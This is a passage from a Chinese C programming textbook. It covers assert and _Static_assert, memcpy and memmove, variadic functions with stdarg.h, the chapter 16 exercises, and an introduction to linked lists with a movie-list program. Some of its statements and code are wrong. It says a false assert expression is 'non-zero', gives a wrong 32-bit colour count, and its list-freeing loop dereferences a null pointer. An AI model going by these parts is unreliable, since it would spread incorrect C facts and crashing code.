*/ if (res != 0) return res; else /* 如果同姓,则比较名 */ return strcmp(ps1->first, ps2->first); } 该函数使用 strcmp()函数进行比较。strcmp()的返回值与比较函数的要求 相匹配。注意,通过指针访问结构成员时必须使用->运算符。 1274 16.12 断言库 assert.h 头文件支持的断言库是一个用于辅助调试程序的小型库。它由 assert()宏组成,接受一个整型表达式作为参数。如果表达式求值为假(非 零),assert()宏就在标准错误流(stderr)中写入一条错误信息,并调用 abort()函数终止程序(abort()函数的原型在stdlib.h头文件中)。assert()宏是 为了标识出程序中某些条件为真的关键位置,如果其中的一个具体条件为 假,就用 assert()语句终止程序。通常,assert()的参数是一个条件表达式或 逻辑表达式。如果 assert()中止了程序,它首先会显示失败的测试、包含测 试的文件名和行号。 16.12.1 assert的用法 程序清单16.18演示了一个使用assert的小程序。在求平方根之前,该程 序断言z是否大于或等于0。程序还错误地减去一个值而不是加上一个值,故 意让z得到不合适的值。 程序清单16.18 assert.c程序 /* assert.c -- 使用 assert() */ #include <stdio.h> #include <math.h> #include <assert.h> int main() { double x, y, z; puts("Enter a pair of numbers (0 0 to quit): "); 1275 while (scanf("%lf%lf", &x, &y) == 2 && (x != 0 || y != 0)) { z = x * x - y * y; /* 应该用 + */ assert(z >= 0); printf("answer is %f\n", sqrt(z)); puts("Next pair of numbers: "); } puts("Done"); return 0; } 下面是该程序的运行示例: Enter a pair of numbers (0 0 to quit): 4 3 answer is 2.645751 Next pair of numbers: 5 3 answer is 4.000000 Next pair of numbers: 1276 3 5 Assertion failed: (z >= 0), function main, file /Users/assert.c, line 14. 具体的错误提示因编译器而异。让人困惑的是,这条消息可能不是指明 z >= 0,而是指明没有满足z >=0的条件。 用if语句也能完成类似的任务: if (z < 0) { puts("z less than 0"); abort(); } 但是,使用 assert()有几个好处:它不仅能自动标识文件和出问题的行 号,还有一种无需更改代码就能开启或关闭 assert()的机制。如果认为已经 排除了程序的 bug,就可以把下面的宏定义写在包含assert.h的位置前面: #define NDEBUG 并重新编译程序,这样编译器就会禁用文件中的所有 assert()语句。如 果程序又出现问题,可以移除这条#define指令(或者把它注释掉),然后重 新编译程序,这样就重新启用了assert()语句。 16.12.2 _Static_assert(C11) assert()表达式是在运行时进行检查。C11新增了一个特性: _Static_assert声明,可以在编译时检查assert()表达式。因此,assert()可以导 致正在运行的程序中止,而_Static_assert()可以导致程序无法通过编译。 _Static_assert()接受两个参数。第1个参数是整型常量表达式,第2个参数是 1277 一个字符串。如果第 1 个表达式求值为 0(或_False),编译器会显示字符 串,而且不编译该程序。看看程序清单16.19的小程序,然后查看assert()和 _Static_assert()的区别。 程序清单16.19 statasrt.c程序 // statasrt.c #include <stdio.h> #include <limits.h> _Static_assert(CHAR_BIT == 16, "16-bit char falsely assumed"); int main(void) { puts("char is 16 bits."); return 0; } 下面是在命令行编译的示例: $ clang statasrt.c statasrt.c:4:1: error: static_assert failed "16-bit char falsely assumed" _Static_assert(CHAR_BIT == 16, "16-bit char falsely assumed"); ^        ~~~~~~~~~~~~~~ 1 error generated. $ 1278 根据语法,_Static_assert()被视为声明。因此,它可以出现在函数中, 或者在这种情况下出现在函数的外部。 _Static_assert要求它的第1个参数是整型常量表达式,这保证了能在编 译期求值(sizeof表达式被视为整型常量)。不能用程序清单16.18中的assert 代替_Static_assert,因为assert中作为测试表达式的z > 0不是常量表达式,要 到程序运行时才求值。当然,可以在程序清单16.19的main()函数中使用 assert(CHAR_BIT == 16),但这会在编译和运行程序后才生成一条错误信 息,很没效率。 1279 16.13 string.h库中的memcpy()和memmove() 不能把一个数组赋给另一个数组,所以要通过循环把数组中的每个元素 赋给另一个数组相应的元素。有一个例外的情况是:使用strcpy()和strncpy() 函数来处理字符数组。memcpy()和memmove()函数提供类似的方法处理任意 类型的数组。下面是这两个函数的原型: void *memcpy(void * restrict s1, const void * restrict s2, size_t n); void *memmove(void *s1, const void *s2, size_t n); 这两个函数都从 s2 指向的位置拷贝 n 字节到 s1 指向的位置,而且都返 回 s1 的值。所不同的是, memcpy()的参数带关键字restrict,即memcpy()假 设两个内存区域之间没有重叠;而memmove()不作这样的假设,所以拷贝过 程类似于先把所有字节拷贝到一个临时缓冲区,然后再拷贝到最终目的地。 如果使用 memcpy()时,两区域出现重叠会怎样?其行为是未定义的,这意 味着该函数可能正常工作,也可能失败。编译器不会在本不该使用 memcpy()时禁止你使用,作为程序员,在使用该函数时有责任确保两个区域 不重叠。 由于这两个函数设计用于处理任何数据类型,所有它们的参数都是两个 指向 void 的指针。C 允许把任何类型的指针赋给void *类型的指针。如此宽 容导致函数无法知道待拷贝数据的类型。因此,这两个函数使用第 3 个参数 指明待拷贝的字节数。注意,对数组而言,字节数一般与元素个数不同。如 果要拷贝数组中10个double类型的元素,要使用10*sizeof(double),而不是 10。 程序清单16.20中的程序使用了这两个函数。该程序假设double类型是int 类型的两倍大小。另外,该程序还使用了C11的_Static_assert特性测试断 言。 程序清单16.20 mems.c程序 1280 // mems.c -- 使用 memcpy() 和 memmove() #include <stdio.h> #include <string.h> #include <stdlib.h> #define SIZE 10 void show_array(const int ar [], int n); // 如果编译器不支持C11的_Static_assert,可以注释掉下面这行 _Static_assert(sizeof(double) == 2 * sizeof(int), "double not twice int size"); int main() { int values[SIZE] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 }; int target[SIZE]; double curious[SIZE / 2] = { 2.0, 2.0e5, 2.0e10, 2.0e20, 5.0e30 }; puts("memcpy() used:"); puts("values (original data): "); show_array(values, SIZE); memcpy(target, values, SIZE * sizeof(int)); puts("target (copy of values):"); show_array(target, SIZE); 1281 puts("\nUsing memmove() with overlapping ranges:"); memmove(values + 2, values, 5 * sizeof(int)); puts("values -- elements 0-4 copied to 2-6:"); show_array(values, SIZE); puts("\nUsing memcpy() to copy double to int:"); memcpy(target, curious, (SIZE / 2) * sizeof(double)); puts("target -- 5 doubles into 10 int positions:"); show_array(target, SIZE / 2); show_array(target + 5, SIZE / 2); return 0; } void show_array(const int ar [], int n) { int i; for (i = 0; i < n; i++) printf("%d ", ar[i]); putchar('\n'); } 下面是该程序的输出: 1282 memcpy() used: values (original data): 1 2 3 4 5 6 7 8 9 10 target (copy of values): 1 2 3 4 5 6 7 8 9 10 Using memmove() with overlapping ranges: values -- elements 0-4 copied to 2-6: 1 2 1 2 3 4 5 8 9 10 Using memcpy() to copy double to int: target -- 5 doubles into 10 int positions: 0 1073741824 0 1091070464 536870912 1108516959 2025163840 1143320349 -2012696540 1179618799 程序中最后一次调用 memcpy()从 double 类型数组中把数据拷贝到 int 类 型数组中,这演示了memcpy()函数不知道也不关心数据的类型,它只负责从 一个位置把一些字节拷贝到另一个位置(例如,从结构中拷贝数据到字符数 组中)。而且,拷贝过程中也不会进行数据转换。如果用循环对数组中的每 个元素赋值,double类型的值会在赋值过程被转换为int类型的值。这种情况 下,按原样拷贝字节,然后程序把这些位组合解释成int类型。 1283 16.14 可变参数:stdarg.h 本章前面提到过变参宏,即该宏可以接受可变数量的参数。stdarg.h 头 文件为函数提供了一个类似的功能,但是用法比较复杂。必须按如下步骤进 行: 1.提供一个使用省略号的函数原型; 2.在函数定义中创建一个va_list类型的变量; 3.用宏把该变量初始化为一个参数列表; 4.用宏访问参数列表; 5.用宏完成清理工作。 接下来详细分析这些步骤。这种函数的原型应该有一个形参列表,其中 至少有一个形参和一个省略号: void f1(int n, ...);        // 有效 int f2(const char * s, int k, ...); // 有效 char f3(char c1, ..., char c2);// 无效,省略号不在最后 double f3(...);           // 无效,没有形参 最右边的形参(即省略号的前一个形参)起着特殊的作用,标准中用 parmN这个术语来描述该形参。在上面的例子中,第1行f1()中parmN为n,第 2行f2()中parmN为k。传递给该形参的实际参数是省略号部分代表的参数数 量。例如,可以这样使用前面声明的f1()函数: f1(2, 200, 400);      // 2个额外的参数 f1(4, 13, 117, 18, 23);  // 4个额外的参数 1284 接下来,声明在stdarg.h中的va_list类型代表一种用于储存形参对应的形 参列表中省略号部分的数据对象。变参函数的定义起始部分类似下面这样: double sum(int lim,...) { va_list ap;  //声明一个储存参数的对象 在该例中,lim是parmN形参,它表明变参列表中参数的数量。 然后,该函数将使用定义在stdarg.h中的va_start()宏,把参数列表拷贝到 va_list类型的变量中。该宏有两个参数:va_list类型的变量和parmN形参。 接着上面的例子讨论,va_list类型的变量是ap,parmN形参是lim。所以,应 这样调用它: va_start(ap, lim); // 把ap初始化为参数列表 下一步是访问参数列表的内容,这涉及使用另一个宏va_arg()。该宏接 受两个参数:一个va_list类型的变量和一个类型名。第1次调用va_arg()时, 它返回参数列表的第1项;第2次调用时返回第2项,以此类推。表示类型的 参数指定了返回值的类型。例如,如果参数列表中的第1个参数是double类 型,第2个参数是int类型,可以这样做: double tic; int toc; ... tic = va_arg(ap, double); // 检索第1个参数 toc = va_arg(ap, int);   //检索第2个参数 注意,传入的参数类型必须与宏参数的类型相匹配。如果第1个参数是 1285 10.0,上面tic那行代码可以正常工作。但是如果参数是10,这行代码可能会 出错。这里不会像赋值那样把double类型自动转换成int类型。 最后,要使用va_end()宏完成清理工作。例如,释放动态分配用于储存 参数的内存。该宏接受一个va_list类型的变量: va_end(ap); // 清理工作 调用va_end(ap)后,只有用va_start重新初始化ap后,才能使用变量ap。 因为va_arg()不提供退回之前参数的方法,所以有必要保存va_list类型 变量的副本。C99新增了一个宏用于处理这种情况:va_copy()。该宏接受两 个va_list类型的变量作为参数,它把第2个参数拷贝给第1个参数: va_list ap; va_list apcopy; double double tic; int toc; ... va_start(ap, lim);     // 把ap初始化为一个参数列表 va_copy(apcopy, ap);    // 把apcopy作为ap的副本 tic = va_arg(ap, double); // 检索第1个参数 toc = va_arg(ap, int);   // 检索第2个参数 此时,即使删除了ap,也可以从apcopy中检索两个参数。 1286 程序清单 16.21 中的程序示例中演示了如何创建这样的函数,该函数对 可变参数求和。sum()的第 1个参数是待求和项的数目。 程序清单16.21 varargs.c程序 //varargs.c -- use variable number of arguments #include <stdio.h> #include <stdarg.h> double sum(int, ...); int main(void) { double s, t; s = sum(3, 1.1, 2.5, 13.3); t = sum(6, 1.1, 2.1, 13.1, 4.1, 5.1, 6.1); printf("return value for " "sum(3, 1.1, 2.5, 13.3):       %g\n", s); printf("return value for " "sum(6, 1.1, 2.1, 13.1, 4.1, 5.1, 6.1): %g\n", t); return 0; } double sum(int lim, ...) 1287 { va_list ap;           // 声明一个对象储存参数 double tot = 0; int i; va_start(ap, lim);     // 把ap初始化为参数列表 for (i = 0; i < lim; i++) tot += va_arg(ap, double); // 访问参数列表中的每一项 va_end(ap);           // 清理工作 return tot; } 下面是该程序的输出: return value for sum(3, 1.1, 2.5, 13.3):         16.9 return value for sum(6, 1.1, 2.1, 13.1, 4.1, 5.1, 6.1):  31.6 查看程序中的运算可以发现,第1次调用sum()时对3个数求和,第2次调 用时对6个数求和。 总而言之,使用变参函数比使用变参宏更复杂,但是函数的应用范围更 广。 1288 16.15 关键概念 C标准不仅描述C语言,还描述了组成C语言的软件包、C预处理器和C 标准库。通过预处理器可以控制编译过程、列出要替换的内容、指明要编译 的代码行和影响编译器其他方面的行为。C库扩展了C语言的作用范围,为 许多编程问题提供现成的解决方案。 1289 16.16 本章小结 C预处理器和C库是C语言的两个重要的附件。C预处理器遵循预处理器 指令,在编译源代码之前调整源代码。C 库提供许多有助于完成各种任务的 函数,包括输入、输出、文件处理、内存管理、排序与搜索、数学运算、字 符串处理等。附录B的参考资料V中列出了完整的ANSI C库。 1290 16.17 复习题 1.下面的几组代码由一个或多个宏组成,其后是使用宏的源代码。在每 种情况下代码的结果是什么?这些代码是否是有效代码?(假设其中的变量 已声明) a. #define FPM 5280 /*每英里的英尺数*/ dist = FPM * miles; b. #define FEET 4 #define POD FEET + FEET plort = FEET * POD; c. #define SIX = 6; nex = SIX; d. #define NEW(X) X + 5 y = NEW(y); berg = NEW(berg) * lob; est = NEW(berg) / NEW(y); 1291 nilp = lob * NEW(-berg); 2.修改复习题1中d部分的定义,使其更可靠。 3.定义一个宏函数,返回两值中的较小值。 4.定义EVEN_GT(X, Y)宏,如果X为偶数且大于Y,该宏返回1。 5.定义一个宏函数,打印两个表达式及其值。例如,若参数为3+4和 4*12,则打印: 3+4 is 7 and 4*12 is 48 6.创建#define指令完成下面的任务。 a.创建一个值为25的命名常量。 b.SPACE表示空格字符。 c.PS()代表打印空格字符。 d.BIG(X)代表X的值加3。 e.SUMSQ(X, Y)代表X和Y的平方和。 7.定义一个宏,以下面的格式打印名称、值和int类型变量的地址: name: fop; value: 23; address: ff464016 8.假设在测试程序时要暂时跳过一块代码,如何在不移除这块代码的前 提下完成这项任务? 9.编写一段代码,如果定义了PR_DATE宏,则打印预处理的日期。 10.内联函数部分讨论了3种不同版本的square()函数。从行为方面看, 这3种版本的函数有何不同? 1292 11.创建一个使用泛型选择表达式的宏,如果宏参数是_Bool类型, 对"boolean"求值,否则对"not boolean"求值。 12.下面的程序有什么错误? #include <stdio.h> int main(int argc, char argv[]) { printf("The square root of %f is %f\n", argv[1],sqrt(argv[1]) ); } 13.假设 scores 是内含 1000 个 int 类型元素的数组,要按降序排序该数 组中的值。假设你使用qsort()和comp()比较函数。 a.如何正确调用qsort()? b.如何正确定义comp()? 14.假设data1是内含100个double类型元素的数组,data2是内含300个 double类型元素的数组。 a.编写memcpy()的函数调用,把data2中的前100个元素拷贝到data1中。 b.编写memcpy()的函数调用,把data2中的后100个元素拷贝到data1中。 1293 16.18 编程练习 1.开发一个包含你需要的预处理器定义的头文件。 2.两数的调和平均数这样计算:先得到两数的倒数,然后计算两个倒数 的平均值,最后取计算结果的倒数。使用#define指令定义一个宏“函数”,执 行该运算。编写一个简单的程序测试该宏。 3.极坐标用向量的模(即向量的长度)和向量相对x轴逆时针旋转的角 度来描述该向量。直角坐标用向量的x轴和y轴的坐标来描述该向量(见图 16.3)。编写一个程序,读取向量的模和角度(单位:度),然后显示x轴 和y轴的坐标。相关方程如下: x = r*cos A y = r*sin A 需要一个函数来完成转换,该函数接受一个包含极坐标的结构,并返回 一个包含直角坐标的结构(或返回指向该结构的指针)。 图16.3 直角坐标和极坐标 4.ANSI库这样描述clock()函数的特性: 1294 #include <time.h> clock_t clock (void); 这里,clock_t是定义在time.h中的类型。该函数返回处理器时间,其单 位取决于实现(如果处理器时间不可用或无法表示,该函数将返回-1)。然 而,CLOCKS_PER_SEC(也定义在time.h中)是每秒处理器时间单位的数 量。因此,两个 clock()返回值的差值除以 CLOCKS_PER_SEC得到两次调用 之间经过的秒数。在进行除法运算之前,把值的类型强制转换成double类 型,可以将时间精确到小数点以后。编写一个函数,接受一个double类型的 参数表示时间延迟数,然后在这段时间运行一个循环。编写一个简单的程序 测试该函数。 5.编写一个函数接受这些参数:内含int类型元素的数组名、数组的大小 和一个代表选取次数的值。该函数从数组中随机选择指定数量的元素,并打 印它们。每个元素只能选择一次(模拟抽奖数字或挑选陪审团成员)。另 外,如果你的实现有time()(第12章讨论过)或类似的函数,可在srand()中 使用这个函数的输出来初始化随机数生成器rand()。编写一个简单的程序测 试该函数。 6.修改程序清单16.17,使用struct names元素(在程序清单16.17后面的 讨论中定义过),而不是double类型的数组。使用较少的元素,并用选定的 名字显式初始化数组。 7.下面是使用变参函数的一个程序段: #include <stdio.h> #include <stdlib.h> #include <stdarg.h> void show_array(const double ar[], int n); 1295 double * new_d_array(int n, ...); int main() { double * p1; double * p2; p1 = new_d_array(5, 1.2, 2.3, 3.4, 4.5, 5.6); p2 = new_d_array(4, 100.0, 20.00, 8.08, -1890.0); show_array(p1, 5); show_array(p2, 4); free(p1); free(p2); return 0; } new_d_array()函数接受一个int类型的参数和double类型的参数。该函数 返回一个指针,指向由malloc()分配的内存块。int类型的参数指定了动态数 组中的元素个数,double类型的值用于初始化元素(第1个值赋给第1个元 素,以此类推)。编写show_array()和new_d_array()函数的代码,完成这个 程序。 1296 第17章高级数据表示 本章介绍以下内容: 函数:进一步学习malloc() 使用C表示不同类型的数据 新的算法,从概念上增强开发程序的能力 抽象数据类型(ADT) 学习计算机语言和学习音乐、木工或工程学一样。首先,要学会使用工 具:学习如何演奏音阶、如何使用锤子等,然后解决各种问题,如降落、滑 行以及平衡物体之类。到目前为止,读者一直在本书中学习和练习各种编程 技能,如创建变量、结构、函数等。然而,如果想提高到更高层次时,工具 是次要的,真正的挑战是设计和创建一个项目。本章将重点介绍这个更高的 层次,教会读者如何把项目看作一个整体。本章涉及的内容可能比较难,但 是这些内容非常有价值,将帮助读者从编程新手成长为老手。 我们先从程序设计的关键部分,即程序表示数据的方式开始。通常,程 序开发最重要的部分是找到程序中表示数据的好方法。正确地表示数据可以 更容易地编写程序其余部分。到目前为止,读者应该很熟悉C的内置类型: 简单变量、数组、指针、结构和联合。 然而,找出正确的数据表示不仅仅是选择一种数据类型,还要考虑必须 进行哪些操作。也就是说,必须确定如何储存数据,并且为数据类型定义有 效的操作。例如,C实现通常把int类型和指针类型都储存为整数,但是这两 种类型的有效操作不相同。例如,两个整数可以相乘,但是两个指针不能相 乘;可以用*运算符解引用指针,但是对整数这样做毫无意义。C 语言为它 的基本类型都定义了有效的操作。但是,当你要设记数据表示的方案时,你 可能需要自己定义有效操作。在C语言中,可以把所需的操作设计成C函数 1297 来表示。简而言之,设计一种数据类型包括设计如何储存该数据类型和设计 一系列管理该数据的函数。 本章还会介绍一些算法(algorithm),即操控数据的方法。作为一名程 序员,应该掌握这些可以反复解决类似问题的处理方法。 本章将进一步研究设计数据类型的过程,这是一个把算法和数据表示相 匹配的过程。期间会用到一些常见的数据形式,如队列、列表和二叉树。 本章还将介绍抽象数据类型(ADT)的概念。抽象数据类型以面向问题 而不是面向语言的方式,把解决问题的方法和数据表示结合起来。设计一个 ADT后,可以在不同的环境中复用。理解ADT可以为将来学习面向对象程序 设计(OOP)以及C++语言做好准备。 1298 17.1 研究数据表示 我们先从数据开始。假设要创建一个地址簿程序。应该使用什么数据形 式储存信息?由于储存的每一项都包含多种信息,用结构来表示每一项很合 适。如何表示多个项?是否用标准的结构数组?还是动态数组?还是一些其 他形式?各项是否按字母顺序排列?是否要按照邮政编码(或地区编码)查 找各项?需要执行的行为将影响如何储存信息?简而言之,在开始编写代码 之前,要在程序设计方面做很多决定。 如何表示储存在内存中的位图图像?位图图像中的每个像素在屏幕上都 单独设置。在以前黑白屏的年代,可以使用一个计算机位(1 或 0)来表示 一个像素点(开或闭),因此称之为位图。对于彩色显示器而言,如果8位 表示一个像素,可以得到256种颜色。现在行业标准已发展到65536色(每像 素16位)、16777216色(每像素24位)、2147483色(每像素32位),甚至 更多。如果有32位色,且显示器有2560×1440的分辨率,则需要将近1.18亿 位(14M)来表示一个屏幕的位图图像。是用这种方法表示,还是开发一种 压缩信息的方法?是有损压缩(丢失相对次要的数据)还是无损压缩(没有 丢失数据)?再次提醒读者注意,在开始编写代码之前,需要做很多程序设 计方面的决定。 我们来处理一个数据表示的示例。假设要编写一个程序,让用户输入一 年内看过的所有电影(包括DVD和蓝光光碟)。要储存每部影片的各种信 息,如片名、发行年份、导演、主演、片长、影片的种类(喜剧、科幻、爱 情等)、评级等。建议使用一个结构储存每部电影,一个数组储存一年内看 过的电影。为简单起见,我们规定结构中只有两个成员:片名和评级(0~ 10)。程序清单17.1演示了一个基本的实现。 程序清单17.1 films1.c程序 /* films1.c -- 使用一个结构数组 */ #include <stdio.h> 1299 #include <string.h> #define TSIZE   45 /* 储存片名的数组大小 */ #define FMAX   5  /* 影片的最大数量 */ struct film { char title[TSIZE]; int rating; }; char * s_gets(char str[], int lim); int main(void) { struct film movies[FMAX]; int i = 0; int j; puts("Enter first movie title:"); while (i < FMAX && s_gets(movies[i].title, TSIZE) !=  NULL && movies[i].title[0] != '\0') { puts("Enter your rating <0-10>:"); 1300 scanf("%d", &movies[i++].rating); while (getchar() != '\n') continue; puts("Enter next movie title (empty line to stop):"); } if (i == 0) printf("No data entered. "); else printf("Here is the movie list:\n"); for (j = 0; j < i; j++) printf("Movie: %s  Rating: %d\n", movies[j].title,movies[j].rating); printf("Bye!\n"); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); 1301 if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)           // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;      // 处理剩余输入行 } return ret_val; } 该程序创建了一个结构数组,然后把用户输入的数据储存在数组中。直 到数组已满(用 FMAX 进行判断)或者到达文件结尾(用NULL进行判 断),或者用户在首行按下Enter键(用'\0'进行判断),输入才会终止。 这样设计程序有点问题。首先,该程序很可能会浪费许多空间,因为大 部分的片名都不会超过40个字符。但是,有些片名的确很长,如The Discreet Charm of the Bourgeoisie和Won Ton Ton, The Dog Who Saved Hollywood。其次,许多人会觉得每年5部电影的限制太严格了。当然,也可 以放宽这个限制,但是,要多大才合适?有些人每年可以看500部电影,因 此可以把FMAX改为500。但是,对有些人而言,这可能仍然不够,而对有 些人而言一年根本看不了这么多部电影,这样就浪费了大量的内存。另外, 一些编译器对自动存储类别变量(如 movies)可用的内存数量设置了一个 默认的限制,如此大型的数组可能会超过默认设置的值。可以把数组声明为 1302 静态或外部数组,或者设置编译器使用更大的栈来解决这个问题。但是,这 样做并不能根本解决问题。 该程序真正的问题是,数据表示太不灵活。程序在编译时确定所需内存 量,其实在运行时确定会更好。要解决这个问题,应该使用动态内存分配来 表示数据。可以这样做: #define TSIZE 45 /*储存片名的数组大小*/ struct film { char title[TSIZE]; int rating; }; ... int n, i; struct film * movies; /* 指向结构的指针 */ ... printf("Enter the maximum number of movies you'll enter:\n"); scanf("%d", &n); movies = (struct film *) malloc(n * sizeof(struct film)); 第12章介绍过,可以像使用数组名那样使用指针movies。 while (i < FMAX && s_gets(movies[i].title, TSIZE) != NULL &&movies[i].title[0] != '\0') 1303 使用malloc(),可以推迟到程序运行时才确定数组中的元素数量。所 以,如果只需要20个元素,程序就不必分配存放500个元素的空间。但是, 这样做的前提是,用户要为元素个数提供正确的值。 1304 17.2 从数组到链表 理想的情况是,用户可以不确定地添加数据(或者不断添加数据直到用 完内存量),而不是先指定要输入多少项,也不用让程序分配多余的空间。 这可以通过在输入每一项后调用 malloc()分配正好能储存该项的空间。如果 用户输入3部影片,程序就调用malloc()3次;如果用户输入300部影片,程序 就调用malloc()300次。 不过,我们又制造了另一个麻烦。比较一下,一种方法是调用malloc() 一次,为300个filem结构请求分配足够的空间;另一种方法是调用 malloc()300次,分别为每个file结构请求分配足够的空间。前者分配的是连 续的内存块,只需要一个单独的指向struct变量(film)的指针,该指针指向 已分配块中的第1个结构。简单的数组表示法让指针访问块中的每个结构, 如前面代码段所示。第2种方法的问题是,无法保证每次调用malloc()都能分 配到连续的内存块。这意味着结构不一定被连续储存(见图17.1)。因此, 与第1种方法储存一个指向300个结构块的指针相比,你需要储存300个指 针,每个指针指向一个单独储存的结构。 1305 图17.1 一块内存中分配结构和单独分配结构 一种解决方法是创建一个大型的指针数组,并在分配新结构时逐个给这 些指针赋值,但是我们不打算使用这种方法: #define TSIZE 45 /*储存片名的数组大小*/ #define FMAX 500 /*影片的最大数量*/ struct film { char title[TSIZE]; 1306 int rating; }; ... struct film * movies[FMAX]; /* 结构指针数组 */ int i; ... movies[i] = (struct film *) malloc (sizeof (struct film)); 如果用不完500个指针,这种方法节约了大量的内存,因为内含500个指 针的数组比内含500个结构的数组所占的内存少得多。尽管如此,如果用不 到 500 个指针,还是浪费了不少空间。而且,这样还是有500个结构的限 制。 还有一种更好的方法。每次使用 malloc()为新结构分配空间时,也为新 指针分配空间。但是,还得需要另一个指针来跟踪新分配的指针,用于跟踪 新指针的指针本身,也需要一个指针来跟踪,以此类推。要重新定义结构才 能解决这个潜在的问题,即每个结构中包含指向 next 结构的指针。然后, 当创建新结构时,可以把该结构的地址储存在上一个结构中。简而言之,可 以这样定义film结构: #define TSIZE 45 /* 储存片名的数组大小*/ struct film { char title[TSIZE]; int rating; struct film * next; 1307 }; 虽然结构不能含有与本身类型相同的结构,但是可以含有指向同类型结 构的指针。这种定义是定义链表(linked list)的基础,链表中的每一项都包 含着在何处能找到下一项的信息。 在学习链表的代码之前,我们先从概念上理解一个链表。假设用户输入 的片名是Modern Times,等级为10。程序将为film类型的结构分配空间,把 字符串Modern Times拷贝到结构中的title成员中,然后设置rating成员为10。 为了表明该结构后面没有其他结构,程序要把next成员指针设置为 NULL(NULL是一个定义在stdio.h头文件中的符号常量,表示空指针)。当 然,还需要一个单独的指针储存第1个结构的地址,该指针被称为头指针 (head pointer)。头指针指向链表中的第1项。图17.2演示了这种结构(为 节约图片空间,压缩了title成员中的空白)。 图17.2 链表中的第1个项 现在,假设用户输入第2部电影及其评级,如Midnight in Paris和8。程序 为第2个film类型结构分配空间,把新结构的地址储存在第1个结构的next成 员中(擦写了之前储存在该成员中的NULL),这样链表中第1个结构中的 next指针指向第2个结构。然后程序把Midnight in Paris和8拷贝到新结构中, 1308 并把第2个结构中的next成员设置为NULL,表明该结构是链表中的最后一个 结构。图17.3演示了这两个项。 图17.3 链表中的两个项 每加入一部新电影,就以相同的方式来处理。新结构的地址将储存在上 一个结构中,新信息储存在新结构中,而且新结构中的next成员设置为 NULL。从而建立起如图17.4所示的链表。 1309 图17.4 链表中的多个项 假设要显示这个链表,每显示一项,就可以根据该项中已储存的地址来 定位下一个待显示的项。然而,这种方案能正常运行,还需要一个指针储存 链表中第1项的地址,因为链表中没有其他项储存该项的地址。此时,头指 针就派上了用场。 17.2.1 使用链表 1310 从概念上了解了链表的工作原理,接着我们来实现它。程序清单17.2修 改了程序清单17.1,用链表而不是数组来储存电影信息。 程序清单17.2 films2.c程序 /* films2.c -- 使用结构链表 */ #include <stdio.h> #include <stdlib.h>    /* 提供malloc()原型 */ #include <string.h>    /* 提供strcpy()原型 */ #define TSIZE  45    /* 储存片名的数组大小 */ struct film { char title[TSIZE]; int rating; struct film * next;  /* 指向链表中的下一个结构 */ }; char * s_gets(char * st, int n); int main(void) { struct film * head = NULL; struct film * prev, *current; char input[TSIZE]; 1311 /* 收集并储存信息 */ puts("Enter first movie title:"); while (s_gets(input, TSIZE) != NULL && input[0] != '\0') { current = (struct film *) malloc(sizeof(struct film)); if (head == NULL)   /* 第1个结构 */ head = current; else          /* 后续的结构 */ prev->next = current; current->next = NULL; strcpy(current->title, input); puts("Enter your rating <0-10>:"); scanf("%d", &current->rating); while (getchar() != '\n') continue; puts("Enter next movie title (empty line to stop):"); prev = current; } /* 显示电影列表 */ 1312 if (head == NULL) printf("No data entered. "); else printf("Here is the movie list:\n"); current = head; while (current != NULL) { printf("Movie: %s  Rating: %d\n", current->title, current->rating); current = current->next; } /* 完成任务,释放已分配的内存 */ current = head; while (current != NULL) { current = head; head = current->next; free(current); } 1313 printf("Bye!\n"); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)        // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;    // 处理剩余输入行 } return ret_val; } 1314 该程序用链表执行两个任务。第 1 个任务是,构造一个链表,把用户输 入的数据储存在链表中。第 2个任务是,显示链表。显示链表的任务比较简 单,所以我们先来讨论它。 1.显示链表 显示链表从设置一个指向第1个结构的指针(名为current)开始。由于 头指针(名为head)已经指向链表中的第1个结构,所以可以用下面的代码 来完成: current = head; 然后,可以使用指针表示法访问结构的成员: printf("Movie: %s Rating: %d\n", current->title, current->rating); 下一步是根据储存在该结构中next成员中的信息,重新设置current指针 指向链表中的下一个结构。代码如下: current = current->next; 完成这些之后,再重复整个过程。当显示到链表中最后一个项时, current 将被设置为 NULL,因为这是链表最后一个结构中next成员的值。 while (current != NULL) { printf("Movie: %s Rating: %d\n", current->title, current->rating); current = current->next; } 遍历链表时,为何不直接使用head指针,而要重新创建一个新指针 (current)?因为如果使用head会改变head中的值,程序就找不到链表的开 1315 始处。 2.创建链表 创建链表涉及下面3步: (1)使用malloc()为结构分配足够的空间; (2)储存结构的地址; (3)把当前信息拷贝到结构中。 如无必要不用创建一个结构,所以程序使用临时存储区(input数组)获 取用户输入的电影名。如果用户通过键盘模拟EOF或输入一行空行,将退出 下面的循环: while (s_gets(input, TSIZE) != NULL && input[0] != '\0') 如果用户进行输入,程序就分配一个结构的空间,并将其地址赋给指针 变量current: current = (struct film *) malloc(sizeof(struct film)); 链表中第1 个结构的地址应储存在指针变量head中。随后每个结构的地 址应储存在其前一个结构的next成员中。因此,程序要知道它处理的是否是 第1个结构。最简单的方法是在程序开始时,把head指针初始化为NULL。然 后,程序可以使用head的值进行判断: if (head == NULL) /* 第1个结构*/ head = current; else /* subsequent structures */ prev->next = current; 1316 在上面的代码中,指针prev指向上一次分配的结构。 接下来,必须为结构成员设置合适的值。尤其是,把next成员设置为 NULL,表明当前结构是链表的最后一个结构。还要把input数组中的电影名 拷贝到title成员中,而且要给rating成员提供一个值。如下代码所示: current->next = NULL; strcpy(current->title, input); puts("Enter your rating <0-10>:"); scanf("%d", &current->rating); 由于s_gets()限制了只能输入TSIZE-1个字符,所以用strcpy()函数把input 数组中的字符串拷贝到title成员很安全。 最后,要为下一次输入做好准备。尤其是,要设置 prev 指向当前结 构。因为在用户输入下一部电影且程序为新结构分配空间后,当前结构将成 为新结构的上一个结构,所以程序在循环末尾这样设置该指针: prev = current; 程序是否能正常运行?下面是该程序的一个运行示例: Enter first movie title: Spirited Away Enter your rating <0-10>: 9 Enter next movie title (empty line to stop): The Duelists 1317 Enter your rating <0-10>: 8 Enter next movie title (empty line to stop): Devil Dog: The Mound of Hound Enter your rating <0-10>: 1 Enter next movie title (empty line to stop): Here is the movie list: Movie: Spirited Away Rating: 9 Movie: The Duelists Rating: 8 